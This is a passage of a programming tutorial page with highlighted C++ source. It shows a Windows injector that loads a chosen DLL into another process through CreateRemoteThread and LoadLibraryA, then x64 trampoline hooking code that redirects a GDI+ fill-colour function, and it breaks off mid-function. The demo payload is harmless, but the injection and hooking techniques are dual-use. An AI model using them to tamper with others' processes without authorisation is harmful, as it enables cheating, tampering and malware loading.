<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printHelp</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Source For Example 4 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
#include <gdiplus.h>
#include <Psapi.h>
#pragma comment (lib, "Gdiplus.lib")
</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span><span class="p">(</span><span class="o">*</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span> <span class="nf">GdipSetSolidFillColorPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">orange</span> <span class="o">=</span> <span class="mh">0xffff7700</span><span class="p">;</span>
<span class="k">return</span> <span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">(</span><span class="n">brush</span><span class="p">,</span> <span class="n">orange</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func with NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">absTableMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
